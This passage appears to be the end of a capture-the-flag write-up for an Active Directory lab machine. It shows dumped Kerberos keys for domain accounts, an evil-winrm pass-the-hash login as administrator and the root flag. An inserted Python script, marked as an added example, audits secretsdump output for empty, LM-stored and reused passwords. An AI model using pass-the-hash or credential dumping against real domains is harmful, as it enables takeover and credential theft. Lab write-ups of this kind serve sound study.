babyad.com\babyad-admin:aes256-cts-hmac-sha1-96:29f8a0be305a6a998fd0cb2798e3701f971370c9131d3e2369a13e2750130bc5
babyad.com\babyad-admin:aes128-cts-hmac-sha1-96:63a252cbc4cdc9ceeadea523d04b6673
babyad.com\babyad-admin:des-cbc-md5:f4983204910dbc62
backup-opt:aes256-cts-hmac-sha1-96:e6bd82c49938190ac40fc85355f3c1bb4e8d9739b2e33f9f7d9966b9664cbc12
backup-opt:aes128-cts-hmac-sha1-96:37dc64a75ed9200fcbf844e2d0f4c3ed
backup-opt:des-cbc-md5:98e68c7c892a1fe5
server-opt:aes256-cts-hmac-sha1-96:58ce476e9085de94eefb9fde291703bc6bfc98085f9130fca1af4f17cc9f2f54
server-opt:aes128-cts-hmac-sha1-96:83694fead3994f8afe47736c447dd676
server-opt:des-cbc-md5:2f91d026abdaae08
accn-opt:aes256-cts-hmac-sha1-96:3c0003e231985e6cefb136450c1e3c2c597377f15156402e76c503f7604f5949
accn-opt:aes128-cts-hmac-sha1-96:bfe789b2a8141a2081540ac6262424a9
accn-opt:des-cbc-md5:457acdf425c80d68
[*] Cleaning up...
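As an added example that is not part of the original writeup, here is a short Python audit over secretsdump-format output, the kind of check a defender runs on a sanctioned ntds.dit review rather than on the hashes above: it flags empty-password accounts (the Guest NT hash 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty string), accounts that still have a real LM hash stored, and NT hashes shared between accounts. The sample hash lines are constructed; only the two well-known constants are real.

```python
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash stored when no LM password exists
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty string

# Constructed sample in secretsdump's domain\uid:rid:lmhash:nthash::: layout. Apart
# from the two well-known constants above, every hash value here is made up.
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
BABYAD$:1000:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
wackymaker:1104:aad3b435b51404eeaad3b435b51404ee:33333333333333333333333333333333:::
babyad.com\\babyad-admin:1105:aad3b435b51404eeaad3b435b51404ee:33333333333333333333333333333333:::
backup-opt:1106:0123456789abcdef0123456789abcdef:44444444444444444444444444444444:::
[*] Kerberos keys from ntds.dit
"""

HASH_LINE = re.compile(
    r"^(?P<user>[^:\s]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$"
)


def parse_dump(text):
    """Yield one dict per NTLM hash line; status lines and Kerberos keys are skipped."""
    for line in text.splitlines():
        m = HASH_LINE.match(line)
        if m:
            yield {"user": m["user"], "rid": int(m["rid"]), "lm": m["lm"], "nt": m["nt"]}


def audit(text):
    """Credential-hygiene findings from a sanctioned ntds.dit review: accounts with an
    empty password, accounts whose LM hash is still stored (legacy LM hashing enabled),
    and NT hashes shared by several accounts (password reuse)."""
    entries = list(parse_dump(text))
    by_nt = defaultdict(list)
    for e in entries:
        by_nt[e["nt"]].append(e["user"])
    return {
        "empty_password": [e["user"] for e in entries if e["nt"] == EMPTY_NT],
        "lm_stored": [e["user"] for e in entries if e["lm"] != EMPTY_LM],
        "shared_nt": {h: users for h, users in by_nt.items()
                      if len(users) > 1 and h != EMPTY_NT},
    }
```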
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# evil-winrm -i 192.168.1.5 -u administrator -H bbabdc192282668fe5190ab0c5150b34

Evil-WinRM shell v3.9

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
babyad0\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> gc ../desktop/root.txt
6e9d14c2b7f08a53
*Evil-WinRM* PS C:\Users\Administrator\Documents>



